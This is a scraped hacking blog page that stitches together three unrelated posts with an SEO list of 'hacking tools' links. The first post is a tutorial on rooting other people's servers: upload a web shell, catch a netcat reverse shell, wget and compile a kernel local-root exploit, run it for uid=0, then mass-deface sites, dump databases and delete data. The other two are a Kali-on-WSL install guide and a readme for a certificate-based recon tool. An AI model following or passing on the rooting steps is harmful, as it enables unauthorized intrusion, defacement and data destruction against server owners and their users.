domingo, 30 de agosto de 2020

HOW TO ROOT A SERVER? – SERVER ROOTING

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write  "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)


Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
AFTER THE ROOT 
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.
Related word

Voodoo-Kali - Kali Linux Desktop On Windows 10

Iemhacker-kali-windows

How it works?
 * Kali Linux with XFCE Desktop Environment in Windows Subsystem for Linux (WSL)
 * VcXsrv X Server for Windows is doing the hard GUI lifting
 * XFCE is started natively in WSL and displayed by VcXsrv

Install Voodoo-Kali:
 1, Enable WSL and install Kali Linux from the Microsoft Store. Read Install Kali Linux desktop on Windows 10 from Microsoft Store

 2, To start Kali Linux in Windows 10, open Command Prompt and enter the command: kali

 3, Enter this commands:
      apt install wget -y 
      wget https://raw.githubusercontent.com/Re4son/WSL-Kali-X/master/install-WSL-Kali-X
      bash ./install-WSL-Kali-X

 4, Download and install VcXsrv Windows X Server from SourceForge

 5, Start VcXsrv, accept change in firewall rules, exit VcXsrv

Run Voodoo-Kali:
   Start kali in Windows as normal user (that's default), and launch Voodoo-Kali:
    * as normal user: ./start-xfce
    * as root: sudo /root/xtart-xfce

Run Kali Desktop in an RDP session:
   In Kali Linux WSL, type: sudo /etc/init.d/xrdp start
   In Windows 10, open Run and enter mstsc.exe and connect to "127.0.0.1:3390"
remote%2Bdesktop

Status: Voodoo-Kali is in its infancy and it is far from being elegant. I'm working on it though and step by step I'll push out improvements. Below a snippet of the To-Do list:
 * Clean up and comment the scripts
 * Make for a cleaner exit
 * Better error handling and dependency checking (get rid of sleep, etc.)
 * Improve stability of Java programs
 * Improve the looks??
 * …

   Any help is truly appreciated, in any shape or form – from tips to pull requests.
   Why don't you join the forums to discuss?

Further Information:
 * Offsec – Kali Linux in the Windows App Store
 * MSDN – Windows Subsystem for Linux Overview

                                       Download Voodoo-Kali
Related posts

  1. Blackhat Hacker Tools
  2. Hacker Tools 2019
  3. Pentest Tools For Windows
  4. Hacker Tools Apk Download
  5. Hacking Tools For Kali Linux
  6. Github Hacking Tools
  7. Pentest Reporting Tools
  8. Hack Tools Pc
  9. Pentest Tools List
  10. Hacker Hardware Tools
  11. Hack Apps
  12. Hack Tool Apk No Root
  13. Hacking Tools 2019
  14. Hacking Tools And Software
  15. Hack Rom Tools
  16. Pentest Tools Linux
  17. Pentest Tools Alternative
  18. Hacking Tools Usb
  19. Pentest Tools Subdomain
  20. Kik Hack Tools
  21. Hacker Tools Github
  22. Hack Website Online Tool
  23. How To Make Hacking Tools
  24. Pentest Tools List
  25. Android Hack Tools Github
  26. Hacker Techniques Tools And Incident Handling
  27. Best Hacking Tools 2019
  28. Pentest Tools Tcp Port Scanner
  29. Hacking Tools 2020
  30. Hacking Tools For Windows
  31. Hacker Tools List
  32. Best Hacking Tools 2019
  33. Hacker Tool Kit
  34. Pentest Tools Download
  35. Physical Pentest Tools
  36. Github Hacking Tools
  37. Hack And Tools
  38. Pentest Tools Subdomain
  39. Hacking Tools 2020
  40. Wifi Hacker Tools For Windows
  41. Pentest Tools Github
  42. Hacking Tools For Windows Free Download
  43. Hacks And Tools
  44. Pentest Tools Website
  45. Hacking Tools Kit
  46. Pentest Reporting Tools
  47. Pentest Automation Tools
  48. Hacking Tools Kit
  49. Hack Website Online Tool
  50. Pentest Reporting Tools
  51. Black Hat Hacker Tools
  52. Easy Hack Tools
  53. Nsa Hack Tools
  54. Best Pentesting Tools 2018
  55. Hacker Tools For Windows
  56. Tools Used For Hacking
  57. Hacking Tools For Windows 7
  58. Hacker Tools Windows
  59. Pentest Tools Port Scanner
  60. Pentest Tools Linux
  61. Pentest Tools Nmap
  62. Game Hacking
  63. Pentest Tools Bluekeep
  64. Beginner Hacker Tools
  65. Pentest Tools Alternative
  66. Hacking Tools 2020
  67. Pentest Tools Github
  68. Pentest Tools Tcp Port Scanner
  69. Hacker Tools List
  70. How To Make Hacking Tools
  71. Pentest Tools Android

CertCrunchy - Just A Silly Recon Tool That Uses Data From SSL Certificates To Find Potential Host Names


It just a silly python script that either retrieves SSL Certificate based data from online sources, currently https://crt.sh/, https://certdb.com/, https://sslmate.com/certspotter/, and https://censys.io or given an IP range it will attempt to extract host information from SSL Certificates. If you want to use Censys.io you need to register for an API key.

How to install
git clone https://github.com/joda32/CertCrunchy.git
cd CertCrunchy
sudo pip3 install -r requirements.txt

How to use it?
Very simply -d to get hostnames for a specific domain
-D to get hostnames for a list of domains (just stuff it in a line-delimited text file)
-I to retrieve and parse certificates from hosts in a netblock / IP range (e.g. 192.168.0.0/24)
-T the thread count makes stuff faster, but don't over do it
-o Output file name
-f Output format CSV or JSON, CSV is the default
for the rest, I'm still working on those :)

API keys and configs
All API keys are stored in the api_keys.py file below is a list of supported APIs requiring API keys.
  1. Censys.oi https://censys.io
  2. VirusTotal https://www.virustotal.com/en/documentation/public-api/

More articles